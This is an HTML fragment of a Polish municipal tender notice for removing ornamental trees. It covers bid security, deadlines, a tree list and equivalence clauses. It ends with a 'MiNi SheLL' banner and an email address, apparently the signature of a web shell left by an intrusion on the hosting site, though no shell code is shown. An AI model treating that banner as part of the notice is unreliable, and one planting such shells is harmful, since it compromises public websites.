wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Wykonawca przystępujący do postępowania jest zobowiązany, przed upływem terminu składania ofert, wnieść wadium w kwocie: 3 500,00 zł (słownie: trzy tysiące pięćset złotych 00/100) <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Wzór umowy stanowi załącznik nr 3 do SWZ.<br/>Warunki zmian treści umowy zostały określone w projekcie umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">obejmujące, zgodnie z art. 96 ustawy: - aspekty srodowiskowe</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-10-18 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma przetargowa</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-10-18 10:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-11-14</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Opis przedmiotu zamówienia ciąg dalszy:<br/>8. Wykaz drzew do usunięcia.<br/>Wykaz drzew do usunięcia<br/>Lp.	Lokalizacja (miejsce usunięcia drzewa)	Gatunek (nazwa / odmiana)	Parametry drzew	Ilość [szt.]<br/>1	ul. Szkolna<br/>(pas zieleni (trawnik) wzdłuż ulicy pomiędzy chodnikiem a drogą)	Jabłoń ozdobna	obwód pnia na wys. 130 cm poniżej 100 cm	10<br/>2	ul. Sikorskiego (pas zieleni (trawnik) wzdłuż ulicy pomiędzy chodnikiem a drogą)	Jabłoń ozdobna	obwód pnia na wys. 130 cm poniżej 100 cm	8<br/> Jarząb szwedzki	obwód pnia na wys. 130 cm poniżej 100 cm	2<br/>3	Trakt pieszo- rowerowy łączący ulice: Sikorskiego z Krasińskiego	Robinia akacjowa „UMBRACULIFERA”	obwód pnia na wys. 130 cm poniżej 100 cm	4<br/>4	ul. 3 Maja (na odcinku od skrzyżowania z ul. Staszica do skrzyżowania z ul. Chopina; pas zieleni (trawnik) wzdłuż ulicy pomiędzy chodnikiem a drogą)	Głóg pośredni	obwód pnia na wys. 130 cm poniżej 120 cm	6<br/>5	ul. Jana Pawła II (w chodniku przed blokiem nr 2) 0<br/>6	Teren rekreacyjny Przystanek Kwiatowa (przy ul. Kwiatowej) 0<br/> 0<br/>Razem	30<br/><br/>Usunięcie drzew obejmuje uporządkowanie terenu i usunięcie całej powstałej biomasy.<br/><br/>Uwagi: Zezwolenie na usunięcie drzew uzyska Zamawiający.<br/>Wykonawca dokona obmiaru i wyceny brakarskiej planowanego do pozyska drewna w zakresie oceny jakości i wartości rynkowej drewna oraz pomniejszy na tej podstawie wartość oferty.<br/>8.	Równoważność:<br/>a)	Zamawiający, w przypadku opisania przedmiotu zamówienia za pomocą znaków towarowych, norm, patentów lub pochodzenia, źródła lub szczególnego procesu, o których mowa w art. 101 ust. 4-5 ustawy, wskazuje, że dopuszcza rozwiązania równoważne opisywanym w zakresie przyjętych rozwiązań technicznych, użytych materiałów, wyrobów, norm pod warunkiem, że zaproponowane w ofercie są istotnie równoważne z określonymi w dokumentacji projektowej.<br/>b)	Jeżeli w opisie przedmiotu zamówienia znajdują się jakiekolwiek znaki towarowe, patenty, normy czy inne prawa zastrzeżone lub wyłączne, lub też określone jest pochodzenie przedmiotu zamówienia lub jego części - należy przyjąć, że Zamawiający, ze względu na specyfikę przedmiotu zamówienia, podał taki opis ze wskazaniem na typ i dopuszcza składanie ofert równoważnych pod względem funkcjonalnym oraz o parametrach techniczno-użytkowych nie gorszych niż te podane w opisie przedmiotu zamówienia. W przypadku złożenia oferty zawierającej zastosowanie rozwiązań równoważnych do opisywanych przez Zamawiającego, obowiązek udowodnienia ich równoważności z wymaganiami wskazanymi przez Zamawiającego, leży po stronie Wykonawcy. W takim wypadku Wykonawca wraz z ofertą (nie podlega uzupełnieniu) przedłoży zestawienie materiałów równoważnych wraz z innymi niezbędnymi dokumentami potwierdzającymi spełnienie w/w wymagań, np. kart urządzeń, certyfikaty bezpieczeństwa, deklaracje zgodności, aprobaty techniczne, itp.<br/>c)	Za równoważne, pod względem funkcjonalnym, technicznym i użytkowym, w stosunku do wskazanego przedmiotu zamówienia, Zamawiający uzna takie, oferowane przez Wykonawcę produkty, które posiadają równoważną pod względem technicznym budowę <br/>i wyposażenie, a także takie możliwości funkcjonalne i parametry techniczne co zawarte <br/>w opisie przedmiotu zamówienia produkty o podanych parametrach referencyjnych. <br/>d)	Zamawiający dołożył wszelkich starań w celu zachowania warunków konkurencyjności. Jeżeli mimo to w tekście jakiegokolwiek rodzaju dokumentacji pojawiają się nazwy własne, oznaczenia lub parametry wskazujące na konkretny produkt należy zawsze traktować to jako rozwiązania przykładowe i można zastosować rozwiązania równoważne na przyjętych wyżej warunkach.<br/>e)	W przypadku, gdy Wykonawca nie złoży dokumentów o zastosowaniu innych materiałów i urządzeń, to rozumie się przez to, że do kalkulacji ceny oferty ujęto materiały i urządzenia zaproponowane w opisie przedmiotu zamówienia

Creat By MiNi SheLL
Email: jattceo@gmail.com